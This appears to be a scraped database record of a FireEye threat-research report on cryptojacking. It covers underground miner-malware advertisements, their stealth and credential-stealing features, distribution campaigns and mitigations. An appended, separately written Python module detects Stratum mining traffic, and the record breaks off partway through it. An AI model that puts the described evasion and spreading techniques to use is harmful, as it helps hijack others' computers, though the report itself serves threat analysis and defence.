"NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2018-07-10T12:00:00", "id": 
"FIREEYE:6B4CFD4290F6444DFC070D828CEC509A", "href": "https://www.fireeye.com/blog/threat-research/2018/07/malicious-powershell-detection-via-machine-learning.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2021-11-04T00:24:38", "description": "#### Introduction\n\nCyber criminals tend to favor cryptocurrencies because they provide a certain level of anonymity and can be easily monetized. This [interest has increased in recent years](<https://www.fireeye.com/blog/threat-research/2018/04/cryptocurrencies-cyber-crime-blockchain-infrastructure-use.html>), stemming far beyond the desire to simply use cryptocurrencies as a method of payment for illicit tools and services. Many actors have also attempted to capitalize on the growing popularity of cryptocurrencies, and subsequent rising price, by conducting various operations aimed at them. These operations include malicious cryptocurrency mining (also referred to as cryptojacking), the collection of cryptocurrency wallet credentials, extortion activity, and the targeting of cryptocurrency exchanges.\n\nThis blog post discusses the various trends that we have been observing related to cryptojacking activity, including cryptojacking modules being added to popular malware families, an increase in drive-by cryptomining attacks, the use of mobile apps containing cryptojacking code, cryptojacking as a threat to critical infrastructure, and observed distribution mechanisms.\n\n#### What Is Mining?\n\nAs transactions occur on a blockchain, those transactions must be validated and propagated across the network. As computers connected to the blockchain network (aka nodes) validate and propagate the transactions across the network, the miners include those transactions into \"blocks\" so that they can be added onto the chain. Each block is cryptographically hashed, and must include the hash of the previous block, thus forming the \"chain\" in blockchain. 
In order for miners to compute the complex hashing of each valid block, they must use a machine's computational resources. The more blocks that are mined, the more resource-intensive solving the hash becomes. To overcome this, and accelerate the mining process, many miners will join collections of computers called \"pools\" that work together to calculate the block hashes. The more computational resources a pool harnesses, the greater the pool's chance of mining a new block. When a new block is mined, the pool's participants are rewarded with coins. Figure 1 illustrates the roles miners play in the blockchain network.\n\n \nFigure 1: The role of miners\n\n#### Underground Interest\n\nFireEye iSIGHT Intelligence has identified eCrime actor interest in cryptocurrency mining-related topics dating back to at least 2009 within underground communities. Keywords that yielded significant volumes include miner, cryptonight, stratum, xmrig, and cpuminer. While searches for certain keywords fail to provide context, the frequency of these cryptocurrency mining-related keywords shows a sharp increase in conversations beginning in 2017 (Figure 2). It is probable that at least a subset of actors prefer cryptojacking over other types of financially motivated operations due to the perception that it does not attract as much attention from law enforcement.\n\n \nFigure 2: Underground keyword mentions\n\n#### Monero Is King\n\nThe majority of recent cryptojacking operations have overwhelmingly focused on mining Monero, an open-source cryptocurrency based on the CryptoNote protocol, as a fork of Bytecoin. Unlike many cryptocurrencies, Monero uses a unique technology called \"ring signatures,\" which shuffles users' public keys to eliminate the possibility of identifying a particular user, ensuring it is untraceable. 
Monero also employs a protocol that generates multiple, unique single-use addresses that can only be associated with the payment recipient and cannot feasibly be revealed through blockchain analysis, ensuring that Monero transactions are unable to be linked while also being cryptographically secure.\n\nThe Monero blockchain also uses what's called a \"memory-hard\" hashing algorithm called CryptoNight and, unlike Bitcoin's SHA-256 algorithm, it deters application-specific integrated circuit (ASIC) chip mining. This feature is critical to the Monero developers and allows for CPU mining to remain feasible and profitable. Due to these inherent privacy-focused features and CPU-mining profitability, Monero has become an attractive option for cyber criminals.\n\n#### Underground Advertisements for Miners\n\nBecause most miner utilities are small, open-source tools, many criminals rely on crypters. Crypters are tools that employ encryption, obfuscation, and code manipulation techniques to keep their tools and malware fully undetectable (FUD). Table 1 highlights some of the most commonly repurposed Monero miner utilities.\n\n| **XMR Mining Utilities** |\n|---|\n| XMR-STACK |\n| MINERGATE |\n| XMRMINER |\n| CCMINER |\n| XMRIG |\n| CLAYMORE |\n| SGMINER |\n| CAST XMR |\n| LUKMINER |\n| CPUMINER-MULTI |\n\nTable 1: Commonly used Monero miner utilities\n\nThe following are sample advertisements for miner utilities commonly observed in underground forums and markets. 
Advertisements typically range from stand-alone miner utilities to those bundled with other functions, such as credential harvesters, remote administration tool (RAT) behavior, USB spreaders, and distributed denial-of-service (DDoS) capabilities.\n\n##### Sample Advertisement #1 (Smart Miner + Builder)\n\nIn early April 2018, actor \"Mon\u00a3y\" was observed by FireEye iSIGHT Intelligence selling a Monero miner for $80 USD \u2013 payable via Bitcoin, Bitcoin Cash, Ether, Litecoin, or Monero \u2013 that included unlimited builds, free automatic updates, and 24/7 support. The tool, dubbed Monero Madness (Figure 3), featured a setting called Madness Mode that configures the miner to only run when the infected machine is idle for at least 60 seconds. This allows the miner to work at its full potential without running the risk of being identified by the user. According to the actor, Monero Madness also provides the following features:\n\n * Unlimited builds\n * Builder GUI (Figure 4)\n * Written in AutoIT (no dependencies)\n * FUD\n * Safer error handling\n * Uses most recent XMRig code\n * Customizable pool/port\n * Packed with UPX\n * Works on all Windows OS (32- and 64-bit)\n * Madness Mode option\n\n \nFigure 3: Monero Madness\n\n \nFigure 4: Monero Madness builder\n\n##### Sample Advertisement #2 (Miner + Telegram Bot Builder)\n\nIn March 2018, FireEye iSIGHT Intelligence observed actor \"kent9876\" advertising a Monero cryptocurrency miner called Goldig Miner (Figure 5). The actor requested payment of $23 USD for either CPU or GPU build or $50 USD for both. Payments could be made with Bitcoin, Ether, Litecoin, Dash, or PayPal. 
The miner ostensibly offers the following features:

 * Written in C/C++
 * Build size is small (about 100–150 kB)
 * Hides miner process from popular task managers
 * Can run without Administrator privileges (user-mode)
 * Auto-update ability
 * All data encoded with 256-bit key
 * Access to Telegram bot-builder
 * Lifetime support (24/7) via Telegram

Figure 5: Goldig Miner advertisement

##### Sample Advertisement #3 (Miner + Credential Stealer)

In March 2018, FireEye iSIGHT Intelligence observed actor "TH3FR3D" offering a tool dubbed Felix (Figure 6) that combines a cryptocurrency miner and a credential stealer. The actor requested payment of $50 USD, payable via Bitcoin or Ether. According to the advertisement, the Felix tool boasted the following features:

 * Written in C# (Version 1.0.1.0)
 * Browser stealer for all major browsers (cookies, saved passwords, auto-fill)
 * Monero miner (uses the minergate.com pool by default, but can be configured)
 * FileZilla stealer
 * Desktop file grabber (.txt and more)
 * Can download and execute files
 * Update ability
 * USB spreader functionality
 * PHP web panel

Figure 6: Felix HTTP

##### Sample Advertisement #4 (Miner + RAT)

In January 2018, FireEye iSIGHT Intelligence observed actor "ups" selling a miner for any CryptoNight-based cryptocurrency (e.g., Monero and Dashcoin) for either Linux or Windows operating systems. In addition to being a miner, the tool allegedly provides local privilege escalation through an exploit for [CVE-2016-0099](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2016/ms16-032>) (MS16-032, the Windows Secondary Logon service elevation-of-privilege bug), can download and execute remote files, and can receive commands. Buyers could purchase the Windows or Linux tool for €200 EUR, or €325 EUR for both the Linux and Windows builds, payable via Monero, Bitcoin, Ether, or Dash.
According to the actor, the tool offered the following:

_Windows Build Specifics_

 * Written in C++ (no dependencies)
 * Miner component based on XMRig
 * Easy cryptor and VPS hosting options
 * Web panel (Figure 7)
 * Uses TLS for secured communication
 * Download and execute
 * Auto-update ability
 * Cleanup routine
 * Receive remote commands
 * Perform privilege escalation
 * Features "game mode" (mining stops if the user plays a game)
 * Proxy feature (based on XMRig)
 * Support (for €20/month)
 * Kills other miners from list
 * Hidden from Task Manager
 * Configurable pool, coin, and wallet (via panel)
 * Can mine the following CryptoNight-based coins:
     * Monero
     * Bytecoin
     * Electroneum
     * DigitalNote
     * Karbowanec
     * Sumokoin
     * Fantomcoin
     * Dinastycoin
     * Dashcoin
     * LeviarCoin
     * BipCoin
     * QuazarCoin
     * Bitcedi

_Linux Build Specifics_

 * Issues running on Linux servers (higher performance on desktop OS)
 * Compatible with AMD64 processors on Ubuntu, Debian, Mint (support for CentOS later)

Figure 7: Miner bot web panel

##### Sample Advertisement #5 (Miner + USB Spreader + DDoS Tool)

In August 2017, actor "MeatyBanana" was observed by FireEye iSIGHT Intelligence selling a Monero miner utility that included the ability to download and execute files and perform DDoS attacks. The actor offered the software for $30 USD, payable via Bitcoin.
Ostensibly, the tool works with CPUs only and offers the following features:

 * Configurable miner pool and port (defaults to minergate)
 * Compatible with both 64-bit and 32-bit (x86) Windows
 * Hides from the following popular task managers:
     * Windows Task Manager
     * Process Killer
     * KillProcess
     * System Explorer
     * Process Explorer
     * AnVir
     * Process Hacker
 * Masked as a system driver
 * Does not require administrator privileges
 * No dependencies
 * Registry persistence mechanism
 * Ability to perform "tasks" (download and execute files, navigate to a site, and perform DDoS)
 * USB spreader
 * Support after purchase

#### The Cost of Cryptojacking

The presence of mining software on a network generates costs on three fronts as the miner surreptitiously allocates resources:

 1. Degradation in system performance
 2. Increased electricity cost
 3. Potential exposure of security holes

Cryptojacking consumes processing power, which leads to high CPU load and degraded performance. In extreme cases, CPU overload may even cause the operating system to crash. Infected machines may also attempt to infect neighboring machines and therefore generate large amounts of traffic that can overload victims' networks.

In the case of operational technology (OT) networks, the consequences could be severe. Supervisory control and data acquisition/industrial control systems (SCADA/ICS) environments predominantly rely on decades-old hardware and low-bandwidth networks, so even a slight increase in CPU or network load could leave industrial infrastructure unresponsive, preventing operators from interacting with the controlled process in real time.

The electricity cost, measured in kilowatt-hours (kWh), depends on several factors: how often the malicious miner is configured to run, how many threads it is configured to use while running, and the number of machines mining on the victim's network.
The cost per kWh is also highly variable and depends on geolocation. For example, security researchers who ran Coinhive on a machine for 24 hours found that its electrical consumption was 1.212 kWh. They estimated that this equated to monthly electricity costs of $10.50 USD in the United States, $5.45 USD in Singapore, and $12.30 USD in Germany.

Cryptojacking can also expose often-overlooked security holes in a company's network. Organizations infected with cryptomining malware are also likely vulnerable to more severe exploits and attacks, ranging from ransomware to ICS-specific malware such as [TRITON](<https://www.fireeye.com/blog/threat-research/2018/06/totally-tubular-treatise-on-triton-and-tristation.html>).

#### Cryptocurrency Miner Distribution Techniques

To maximize profits, cyber criminals disseminate their miners widely using techniques such as incorporating cryptojacking modules into existing botnets, drive-by cryptomining attacks, mobile apps containing cryptojacking code, and distributing cryptojacking utilities via spam and self-propagating utilities. Threat actors can use cryptojacking to affect numerous devices and secretly siphon their computing power. Some of the most commonly observed devices targeted by these cryptojacking schemes are:

 * User endpoint machines
 * Enterprise servers
 * Websites
 * Mobile devices
 * Industrial control systems

##### Cryptojacking in the Cloud

Private sector companies and governments alike are increasingly [moving their data and applications to the cloud](<https://www.fireeye.com/blog/executive-perspective/2018/04/anatomy-of-a-public-cloud-compromise.html>), and cyber threat groups have been moving with them. Recently, there have been various reports of actors conducting cryptocurrency mining operations specifically targeting cloud infrastructure.
Cloud infrastructure is increasingly a target for cryptojacking operations because it offers actors large amounts of processing power in an environment where high CPU usage and electricity costs are already expected, allowing their operations to go unnoticed. We assess with high confidence that threat actors will continue to target enterprise cloud networks to harness their collective computational resources for the foreseeable future.

The following are some real-world examples of cryptojacking in the cloud:

 * In February 2018, FireEye researchers published a blog detailing various techniques actors used to deliver malicious miner payloads (specifically to vulnerable Oracle WebLogic servers) by abusing CVE-2017-10271. Refer to our blog post for more detail on the [post-exploitation and pre-mining dissemination techniques](<https://www.fireeye.com/blog/threat-research/2018/02/cve-2017-10271-used-to-deliver-cryptominers.html>) used in those campaigns.
 * In March 2018, [Bleeping Computer reported](<https://www.bleepingcomputer.com/news/security/coinminer-campaigns-move-to-the-cloud-via-docker-kubernetes/>) on the trend of cryptocurrency mining campaigns moving to the cloud via exposed Docker and Kubernetes deployments (a container runtime and a container orchestrator, respectively, used to scale cloud infrastructure). In most cases, successful attacks occur due to misconfiguration (such as management APIs exposed to the internet without authentication) and/or weak security controls and passwords.
 * In February 2018, [Bleeping Computer also reported](<https://www.bleepingcomputer.com/news/security/tesla-internal-servers-infected-with-cryptocurrency-miner/>) on hackers who breached Tesla's cloud servers to mine Monero. Attackers identified a Kubernetes console that was not password protected, which allowed them to discover login credentials for the broader Tesla Amazon Web Services (AWS) S3 cloud environment.
Once the attackers gained access to the AWS environment via the harvested credentials, they launched their cryptojacking operations.
 * Reports of cryptojacking activity due to misconfigured AWS S3 cloud storage buckets have also been observed, as was the case in the [LA Times online compromise](<https://www.theregister.co.uk/2018/02/22/la_times_amazon_aws_s3/>) in February 2018. A world-writable S3 bucket allows anyone on the internet to access and change hosted content, including injecting mining scripts or other malicious software.

##### Incorporation of Cryptojacking into Existing Botnets

FireEye iSIGHT Intelligence has observed multiple prominent botnets, such as Dridex and Trickbot, incorporate cryptocurrency mining into their existing operations. Many of these families are modular and can download and execute remote files, allowing the operators to easily turn their infections into cryptojacking bots. While these operations have traditionally been aimed at credential theft (particularly of banking credentials), adding mining modules or downloading secondary mining payloads gives the operators another avenue to generate additional revenue with little effort. This is especially true where the victims were deemed unprofitable or have already been exploited in the original scheme.

The following are some real-world examples of cryptojacking being incorporated into existing botnets:

 * In early February 2018, FireEye iSIGHT Intelligence observed Dridex botnet ID 2040 download a Monero cryptocurrency miner based on the open-source XMRig miner.
 * On Feb. 12, 2018, FireEye iSIGHT Intelligence observed the banking malware IcedID injecting Monero-mining JavaScript into webpages for specific, targeted URLs.
The IcedID injects launched an anonymous miner using mining code from Coinhive's AuthedMine.
 * In late 2017, [Bleeping Computer reported](<https://www.bleepingcomputer.com/news/security/codefork-group-uses-fileless-malware-to-deploy-monero-miners/>) that security researchers with Radware observed the hacking group CodeFork leveraging the popular downloader Andromeda (aka Gamarue) to distribute a miner module to their existing botnets.
 * In late 2017, FireEye researchers observed Trickbot operators deploy a new module named "testWormDLL" that is a statically compiled copy of the popular XMRig Monero miner.
 * On Aug. 29, 2017, [Security Week reported](<https://www.securityweek.com/jimmy-banking-trojan-reuses-nukebot-code>) on a variant of the popular Neutrino banking Trojan that includes a Monero miner module. According to their reporting, the new variant no longer aims at stealing bank card data and is instead limited to downloading and executing modules from a remote server.

#### Drive-By Cryptojacking

##### In-Browser

FireEye iSIGHT Intelligence has examined various customer reports of browser-based cryptocurrency mining. Browser-based mining scripts have been observed on compromised websites and third-party advertising platforms, and have also been legitimately placed on websites by publishers. While coin mining scripts can be embedded directly into a webpage's source code, they are frequently loaded from third-party websites. Identifying and detecting websites that have embedded coin mining code can be difficult, since not all coin mining scripts are authorized by website publishers, as in the case of a compromised website. Further, where coin mining scripts were authorized by a website owner, they are not always clearly communicated to site visitors. At the time of reporting, the most popular script being deployed in the wild is Coinhive.
Coinhive is an open-source JavaScript library that, when loaded by a web page (whether placed there by the site owner or injected into a compromised site), mines Monero using the site visitor's CPU resources, unbeknownst to the user, for as long as they browse the site.

The following are some real-world examples of Coinhive being deployed in the wild:

 * In September 2017, [Bleeping Computer reported](<https://www.bleepingcomputer.com/news/security/chrome-extension-embeds-in-browser-monero-miner-that-drains-your-cpu/>) that the authors of SafeBrowse, a Chrome extension with more than 140,000 users, had embedded the Coinhive script in the extension's code, mining Monero on users' computers without their consent.
 * In mid-September 2017, [users on Reddit](<https://www.reddit.com/r/thepiratebay/comments/70aip7/100_cpu_on_all_8_threads_while_visiting_tpb/?sort=new>) began complaining about increased CPU usage when they navigated to a popular torrent site, The Pirate Bay (TPB). The spike in CPU usage was the result of Coinhive's script being embedded in the site's footer. According to TPB operators, it was implemented as a test to generate passive revenue for the site (Figure 8).
 * In December 2017, researchers with [Sucuri reported](<https://blog.sucuri.net/2017/12/malicious-cryptominers-from-github.html>) on the Coinhive script being hosted on GitHub.io, which allows users to publish web pages directly from GitHub repositories.
 * Other reporting disclosed the Coinhive script being embedded on the [Showtime domain](<https://www.bleepingcomputer.com/news/security/showtime-websites-used-to-mine-monero-unclear-if-hack-or-an-experiment/>) as well as on the [LA Times website](<https://www.itwire.com/security/81860-la-times-serving-cryptocurrency-mining-script.html>), both surreptitiously mining Monero.
 * The majority of in-browser cryptojacking activity is transitory and lasts only as long as the user's web browser is open.
However, [researchers with Malwarebytes Labs](<https://blog.malwarebytes.com/cybercrime/2017/11/persistent-drive-by-cryptomining-coming-to-a-browser-near-you/>) uncovered a technique that allows mining to continue even after the browser window is closed. The technique leverages a pop-under window hidden beneath the taskbar. As the researchers pointed out, closing the browser window may not be enough to interrupt the activity; more deliberate action, such as terminating the browser process from Task Manager, may be required.

Figure 8: Statement from TPB operators on Coinhive script

##### Malvertising and Exploit Kits

Malvertisements – malicious ads on legitimate websites – commonly redirect a site's visitors to an exploit kit landing page. These landing pages are designed to scan a system for vulnerabilities, exploit them, and download and execute malicious code on the system. Notably, the malicious advertisements can be placed on legitimate sites, and visitors can become infected with little to no user interaction. This distribution tactic is commonly used by threat actors to distribute malware widely and has been employed in various cryptocurrency mining operations.

The following are some real-world examples of this activity:

 * In early 2018, [researchers with Trend Micro reported](<https://www.bleepingcomputer.com/news/security/coinhive-cryptojacker-deployed-on-youtube-via-google-ads/>) that a modified miner script was being disseminated across YouTube via Google's DoubleClick ad delivery platform. The script generated a random number between 1 and 100; when the number was above 10 it launched the Coinhive script _coinhive.min.js_, which used 80 percent of the CPU to mine Monero, and when the number was below 10 it launched a modified Coinhive script, also configured to use 80 percent of the CPU to mine Monero.
This custom miner connected to the mining pool wss[:]//ws[.]l33tsite[.]info:8443, likely to avoid Coinhive's fees.
 * In April 2018, researchers with [Trend Micro](<https://blog.trendmicro.com/trendlabs-security-intelligence/cryptocurrency-web-miner-script-injected-into-aol-advertising-platform/>) also discovered JavaScript code based on Coinhive injected into an AOL ad platform. The miner used the following private mining pools: wss[:]//wsX[.]www.datasecu[.]download/proxy and wss[:]//www[.]jqcdn[.]download:8893/proxy. Examination of other sites compromised by this campaign showed that, in at least some cases, the operators were hosting malicious content on unsecured AWS S3 buckets.
 * Since July 16, 2017, [FireEye has observed](<https://www.fireeye.com/blog/threat-research/2017/08/neptune-exploit-kit-malvertising.html>) the Neptune Exploit Kit redirecting to ads for hiking clubs and MP3 converter domains. Payloads associated with the latter include Monero CPU miners that are surreptitiously installed on victims' computers.
 * In January 2018, [Check Point researchers](<https://research.checkpoint.com/new-rig-exploit-kit-campaign-dropping-xmrig-miner/>) discovered a malvertising campaign leading to the RIG Exploit Kit, which served the XMRig Monero miner to unsuspecting victims.

#### Mobile Cryptojacking

In addition to targeting enterprise servers and user machines, threat actors have also targeted mobile devices for cryptojacking. While this technique is less common, likely due to the limited processing power of mobile devices, cryptojacking on mobile devices remains a threat, as sustained power consumption can damage the device and dramatically shorten battery life.
Threat actors have been observed targeting mobile devices by hosting malicious cryptojacking apps on popular app stores and through drive-by malvertising campaigns that identify users of mobile browsers.

The following are some real-world examples of mobile devices being used for cryptojacking:

 * During 2014, FireEye iSIGHT Intelligence reported on multiple Android malware apps capable of mining cryptocurrency:
     * In March 2014, Android malware named "CoinKrypt" was discovered, which mined Litecoin, Dogecoin, and CasinoCoin.
     * In March 2014, another form of Android malware – "Android.Trojan.MuchSad.A" or "ANDROIDOS_KAGECOIN.HBT" – was observed mining Bitcoin, Litecoin, and Dogecoin. The malware was disguised as copies of popular applications, including "Football Manager Handheld" and "TuneIn Radio." Variants of this malware have reportedly been downloaded by millions of Google Play users.
     * In April 2014, Android malware named "BadLepricon," which mined Bitcoin, was identified. The malware was reportedly bundled into wallpaper applications hosted on the Google Play store, at least several of which received 100 to 500 installations before being removed.
     * In October 2014, a type of mobile malware called "Android Slave" was observed in China; the malware was reportedly capable of mining multiple virtual currencies.
 * In December 2017, [researchers with Kaspersky Lab reported](<https://securelist.com/jack-of-all-trades/83470/>) on a new multi-faceted Android malware capable of a variety of actions, including mining cryptocurrencies and launching DDoS attacks. The resource load created by the malware has reportedly been high enough to cause the battery to bulge and physically destroy the device. The malware, dubbed Loapi, is unique in the breadth of its potential actions.
It has a modular framework that includes modules for malicious advertising, texting, web crawling, Monero mining, and other activities. Loapi is thought to be the work of the same developers behind the 2015 Android malware Podec, and is usually disguised as an anti-virus app.
 * In January 2018, [SophosLabs released a report](<https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophos-coinminer-and-other-malicious-cryptominers-tpna.pdf?la=en>) detailing its discovery of 19 mobile apps hosted on Google Play that contained embedded Coinhive-based cryptojacking code, some of which had been downloaded anywhere from 100,000 to 500,000 times.
 * Between November 2017 and January 2018, [researchers with Malwarebytes Labs reported](<https://blog.malwarebytes.com/threat-analysis/2018/02/drive-by-cryptomining-campaign-attracts-millions-of-android-users/>) on a drive-by cryptojacking campaign that used millions of Android mobile browsers to mine Monero.

#### Cryptojacking Spam Campaigns

FireEye iSIGHT Intelligence has observed several cryptocurrency miners distributed via spam campaigns, a commonly used tactic to indiscriminately distribute malware. We expect malicious actors will continue to use this method to disseminate cryptojacking code for as long as cryptocurrency mining remains profitable.

In late November 2017, FireEye researchers identified a spam campaign delivering a malicious PDF attachment designed to look like a legitimate invoice from the largest port and container service in New Zealand, Lyttelton Port of Christchurch (Figure 9). Once opened, the PDF launched a PowerShell script that downloaded a Monero miner from a remote host.
The malicious miner connected to the pools supportxmr.com and nanopool.org.

Figure 9: Sample lure attachment (PDF) that downloads malicious cryptocurrency miner

Additionally, a massive cryptojacking spam campaign discovered by FireEye researchers in January 2018 was designed to look like legitimate financial services-related emails. The spam email directed victims to an infection link that ultimately dropped a malicious ZIP file onto the victim's machine. Contained within the ZIP file was a cryptocurrency miner utility (MD5: 80b8a2d705d5b21718a6e6efe531d493) configured to mine Monero and connect to the minergate.com pool. While each spam email lure and associated ZIP filename was different, the same cryptocurrency miner sample was dropped across all observed instances (Table 2).

| ZIP Filenames |
| --- |
| california_540_tax_form_2013_instructions.exe |
| state_bank_of_india_money_transfer_agency.exe |
| format_transfer_sms_banking_bni_ke_bca.exe |
| confirmation_receipt_letter_sample.exe |
| sbi_online_apply_2015_po.exe |
| estimated_tax_payment_coupon_irs.exe |
| how_to_add_a_non_us_bank_account_to_paypal.exe |
| western_union_money_transfer_from_uk_to_bangladesh.exe |
| can_i_transfer_money_from_bank_of_ireland_to_aib_online.exe |
| how_to_open_a_business_bank_account_with_bad_credit_history.exe |
| apply_for_sbi_credit_card_online.exe |
| list_of_lucky_winners_in_dda_housing_scheme_2014.exe |

Table 2: Sampling of observed ZIP filenames delivering cryptocurrency miner

#### Cryptojacking Worms

Following the WannaCry attacks, actors increasingly incorporated self-propagating functionality into their malware. Observed self-spreading techniques include copying to removable drives, brute forcing SSH logins, and leveraging the leaked NSA exploit [EternalBlue](<https://www.fireeye.com/blog/threat-research/2017/05/smb-exploited-wannacry-use-of-eternalblue.html>).
Cryptocurrency mining operations benefit significantly from this functionality, since wider distribution of the malware multiplies the CPU resources available for mining. Consequently, we expect additional actors to continue developing this capability.

The following are some real-world examples of cryptojacking worms:

 * In May 2017, [Proofpoint reported](<https://www.proofpoint.com/us/threat-insight/post/adylkuzz-cryptocurrency-mining-malware-spreading-for-weeks-via-eternalblue-doublepulsar>) a large campaign distributing the mining malware "Adylkuzz." This cryptocurrency miner leveraged the EternalBlue exploit to spread itself rapidly over corporate LANs and wireless networks, using the DoublePulsar backdoor to download Adylkuzz. Adylkuzz infections create botnets of Windows computers that focus on mining Monero.
 * In April 2018, security researchers with [Sensors Tech Forum identified](<https://sensorstechforum.com/w32-rarogminer-monero-miner-worm-lsass-exe-remove/>) a Monero miner worm, dubbed "Rarogminer," that copies itself to removable drives each time a user inserts a flash drive or external HDD.
 * In January 2018, [researchers at F5](<https://f5.com/labs/articles/threat-intelligence/malware/new-python-based-crypto-miner-botnet-flying-under-the-radar>) discovered a new Monero cryptomining botnet, PyCryptoMiner, that targets Linux machines. PyCryptoMiner is a Python script that spreads via SSH and can also use Pastebin for its command and control (C2) infrastructure. The malware spreads by guessing the SSH login credentials of target Linux systems. Once in, the bot deploys a simple base64-encoded Python script that connects to the C2 server to download and execute further malicious Python code.

#### Detection Avoidance Methods

Another trend worth noting is the use of proxies to avoid detection.
Mining proxies are attractive to cyber criminals because they allow them to avoid developer and commission fees of 30 percent or more. Avoiding common cryptojacking services such as Coinhive, Crypto-Loot, and Deepminer, and instead hosting cryptojacking scripts on actor-controlled infrastructure, circumvents many of the common strategies used to block this activity via domain or file name blacklisting. Because a self-hosted script or proxy has no blacklist history, detection then has to fall back on what the proxy does not change: the structure of the mining traffic itself and the CPU behaviour on the host.

In March 2018, [Bleeping Computer reported](<https://www.bleepingcomputer.com/news/security/in-browser-cryptojacking-is-getting-harder-to-detect/>) on the use of cryptojacking proxy servers and determined that as the use of cryptojacking proxy services increases, the effectiveness of ad blockers and browser extensions that rely on blacklists decreases significantly.

Several mining proxy tools can be found on GitHub, such as [XMRig Proxy](<https://github.com/xmrig/xmrig-proxy>), which greatly reduces the number of active pool connections, and the [CoinHive Stratum Mining Proxy](<https://github.com/x25/coinhive-stratum-mining-proxy>), which uses Coinhive's JavaScript mining library to provide an alternative to the official Coinhive scripts and infrastructure.

In addition to using proxies, actors may also host their own miner apps, either on private servers or on cloud-based servers that support Node.js. Although private servers may provide some benefit over a commercial mining service, they are still easy to blacklist and require more operational effort to maintain.
According to [Sucuri researchers](<https://blog.sucuri.net/2018/01/malicious-cryptominers-from-github-part-2.html>), cloud-based servers provide many benefits to actors looking to host their own mining applications, including:

 * Available free or at low cost
 * No maintenance; just upload the crypto-miner app
 * Harder to block, as blacklisting the host address could impact access to legitimate services
 * Resilient to permanent takedown, as new hosting accounts can easily be created with disposable accounts

The combination of proxies and crypto-miners hosted on actor-controlled cloud infrastructure presents a significant hurdle to security professionals, as both make cryptojacking operations more difficult to detect and take down.

#### Mining Victim Demographics

Based on data from FireEye detection technologies, detections of cryptocurrency miner malware have increased significantly since the beginning of 2018 (Figure 10), with the most popular mining pools being minergate and nanopool (Figure 11) and the most heavily affected country being the U.S. (Figure 12).
Consistent with [other reporting](<https://www.bleepingcomputer.com/news/cryptocurrency/students-mining-cryptocurrencies-are-clogging-up-university-networks/>), the education sector remains the most affected, likely due to more relaxed security controls across university networks and students taking advantage of free electricity to mine cryptocurrencies (Figure 13).

Figure 10: Cryptocurrency miner detection activity per month

Figure 11: Commonly observed pools and associated ports

Figure 12: Top 10 affected countries

Figure 13: Top five affected industries

Figure 14: Top affected industries by country

#### Mitigation Techniques

##### Unencrypted Stratum Sessions

According to security researchers at Cato Networks, for a miner to participate in pool mining, the infected machine has to run native or JavaScript-based code that speaks the Stratum protocol over TCP or HTTP/S. Stratum uses a publish/subscribe architecture in which clients send subscription requests to join a pool and the server publishes messages (new jobs) to its subscribed clients. These messages are simple, readable, newline-delimited JSON-RPC messages. Subscription requests carry the entities id, method, and params (Figure 15). A deep packet inspection (DPI) engine can be configured to look for these parameters in order to block Stratum over unencrypted TCP. Note that the CryptoNote pool dialect spoken by XMRig-based Monero miners uses the methods "login", "getjob", "submit" and "keepalived" rather than the Stratum v1 "mining.subscribe" and "mining.authorize" methods, so a DPI signature should key on the JSON-RPC structure and cover both method families rather than a single method name.

Figure 15: Stratum subscription request parameters

##### Encrypted Stratum Sessions

In the case of JavaScript-based miners running Stratum over HTTPS, detection is more difficult for DPI engines that do not decrypt TLS traffic. To mitigate encrypted mining traffic on a network, organizations may blacklist the IP addresses and domains of popular mining pools. Even without decryption, the pool hostname is usually visible in the Server Name Indication (SNI) extension of the TLS ClientHello, so the same domain list can be applied there.
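The following Python module is an added example (not FireEye's or Cato Networks' code) of the content-based detection discussed in this section. stratum_findings keys on the id/method/params structure of Stratum JSON-RPC requests in a raw TCP payload, covering both the Stratum v1 methods and the login/submit dialect used by XMRig-based Monero miners; because that structure survives unchanged behind an actor-controlled proxy of the kind described under Detection Avoidance Methods, it does not depend on a pool blacklist. browser_miner_indicators applies the naming-convention approach to page content: known miner script names, the CoinHive.Anonymous and CoinHive.User constructor names (taken from Coinhive's public API, not from this page), and "/proxy" WebSocket endpoints like those seen in the AOL malvertising case. The payload, the placeholder wallet, the hostnames and the HTML snippet are all constructed for the demonstration, and the Monero address check is structural only (length and base58 alphabet, no checksum).

```python
"""Content-based cryptojacking indicators that do not rely on a pool blacklist.

Added example, not FireEye or Cato Networks code. Two checks:
  stratum_findings()         Stratum JSON-RPC requests in a raw TCP payload
  browser_miner_indicators() in-browser miner markers in HTML/JS page content
All sample inputs at the bottom are constructed for the demonstration.
"""
import json
import re

# Request methods of the CryptoNote/XMRig pool dialect and of Stratum v1.
STRATUM_METHODS = {
    "login", "getjob", "submit", "keepalived",
    "mining.subscribe", "mining.authorize", "mining.submit",
}

# Shape of a Monero standard address or subaddress: 95 base58 characters
# starting with 4 or 8 (base58 omits 0, O, I and l). No checksum is verified.
MONERO_ADDRESS = re.compile(r"^[48][1-9A-HJ-NP-Za-km-z]{94}$")


def stratum_findings(payload: bytes):
    """Return (method, wallet, agent) for each Stratum request in the payload.

    Stratum is newline-delimited JSON-RPC, and a request always carries the
    keys "id", "method" and "params"; responses (no "method") are ignored.
    """
    found = []
    for raw in payload.split(b"\n"):
        raw = raw.strip()
        if not raw.startswith(b"{"):
            continue                      # not JSON, e.g. an HTTP request line
        try:
            msg = json.loads(raw)
        except ValueError:
            continue
        if not isinstance(msg, dict) or not {"id", "method", "params"} <= set(msg):
            continue
        method, params = msg["method"], msg["params"]
        if method not in STRATUM_METHODS:
            continue
        wallet = agent = None
        if isinstance(params, dict):                # XMRig dialect: object params
            wallet, agent = params.get("login"), params.get("agent")
        elif isinstance(params, list) and params:   # Stratum v1: positional params
            if method == "mining.authorize":
                wallet = params[0]
            elif method == "mining.subscribe":
                agent = params[0]
        found.append((method, wallet, agent))
    return found


def looks_like_monero_wallet(value) -> bool:
    """True when a login string has the shape of a Monero address once a
    worker suffix (ADDRESS.rig1) or difficulty suffix (ADDRESS+50000) is removed."""
    if not isinstance(value, str):
        return False
    return bool(MONERO_ADDRESS.match(re.split(r"[.+]", value, maxsplit=1)[0]))


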